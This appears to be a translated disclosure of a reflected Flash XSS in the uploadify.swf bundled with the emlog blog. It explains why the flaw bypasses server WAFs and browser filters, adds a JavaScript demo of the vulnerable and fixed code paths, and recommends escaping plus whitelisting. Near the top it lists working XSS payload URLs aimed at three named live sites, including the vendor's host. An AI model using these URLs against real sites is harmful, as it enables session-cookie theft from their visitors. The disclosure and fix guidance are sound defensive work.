Tested against the official host site:
http://host.emlog.net/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//

The blog of 奇遇, one of the developers:
http://blog.qiyuuu.com/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//

思想之地:
http://be-evil.org/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//

And so on; I won't list any more. Because this is a Flash XSS, it bypasses the server-side WAF and the browser's XSS filter: the server only serves a static .swf, and the JavaScript is assembled inside the Flash player from the movieName flashvar when the SWF calls out to the page, so neither the WAF nor the browser ever sees script in an HTTP response. I won't say much more about this swf; it's an old problem.
Fix: patch the swf (validate and escape the movieName flashvar before it is passed into JavaScript).
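The following is an added demonstration, not code from emlog or from the uploadify project. It models how a flashvar such as movieName ends up inside the JavaScript string that an SWF hands to the page through ExternalInterface, why the reported payload gains execution there, and what the SWF-side fix looks like. The skeleton `try { cb([...]); } catch (e) { ... }`, the callback name `cb`, the `PHPSESSID=constructed` cookie and the whitelist regex are all assumptions made for the example; the real Flash player template differs in its details.

```javascript
// Added example, not part of the original report or of emlog/uploadify.
// Models the movieName -> JavaScript path inside uploadify.swf.

// One of the URLs from the report, used to recover the raw movieName value.
const REPORT_URL =
  'http://host.emlog.net/include/lib/js/uploadify/uploadify.swf?movieName=' +
  '%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//';

// Decode the movieName flashvar exactly as the Flash player would receive it.
function movieNameFromUrl(url) {
  return new URL(url).searchParams.get('movieName');
}

// Vulnerable: the flashvar is concatenated straight into the JavaScript that
// the SWF asks the browser to evaluate. The skeleton is an ASSUMPTION chosen
// to match the report's payload ("]) closes string, array and call).
function buildCallVulnerable(movieName) {
  return 'try { cb(["' + movieName + '"]); } catch (e) { "<undefined/>"; }';
}

// Hardened step 1: serialise the value as a JavaScript string literal so a
// quote or backslash in it cannot terminate the literal.
function buildCallEscaped(movieName) {
  return 'try { cb([' + JSON.stringify(movieName) + ']); } catch (e) { "<undefined/>"; }';
}

// Hardened step 2: uploadify only ever needs an element id here, so also
// reject anything that is not identifier-like (assumed policy, not the project's).
const SAFE_MOVIE_NAME = /^[A-Za-z0-9_-]{1,64}$/;
function buildCallSafe(movieName) {
  if (!SAFE_MOVIE_NAME.test(movieName)) {
    throw new Error('movieName rejected: ' + JSON.stringify(movieName));
  }
  return buildCallEscaped(movieName);
}

// Stand-in for the page: evaluates the generated code with a fake window,
// document and alert. cb() throws to model a page-side callback that is not
// ready yet, which is what makes any catch block run (constructed for the demo).
function runInPage(code) {
  const alerts = [];
  const fakeWindow = {};
  const fakeDocument = { cookie: 'PHPSESSID=constructed' };
  const cb = () => { throw new Error('callback not ready'); };
  new Function('window', 'document', 'alert', 'cb', code)(
    fakeWindow, fakeDocument, (m) => alerts.push(m), cb);
  return alerts;
}

// Runs the payload from the report through the vulnerable and hardened builders.
function demo() {
  const payload = movieNameFromUrl(REPORT_URL);
  const stolen = runInPage(buildCallVulnerable(payload)); // alert fires with the cookie
  const escaped = runInPage(buildCallEscaped(payload));   // payload stays inside the string
  let strictRejected = false;
  try { buildCallSafe(payload); } catch (e) { strictRejected = true; }
  const benign = runInPage(buildCallSafe('uploadify'));   // legitimate id still works
  return { payload, stolen, escaped, strictRejected, benign };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

Note that the WAF bypass is inherent to where the string is built: the HTTP request is a GET for a static file and the JavaScript only exists inside the Flash runtime, so the fix has to live in the SWF (escaping plus validation), not in a server-side filter.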
Original report: emlog blog front-end reflected XSS (bypasses browser filter) - 网站安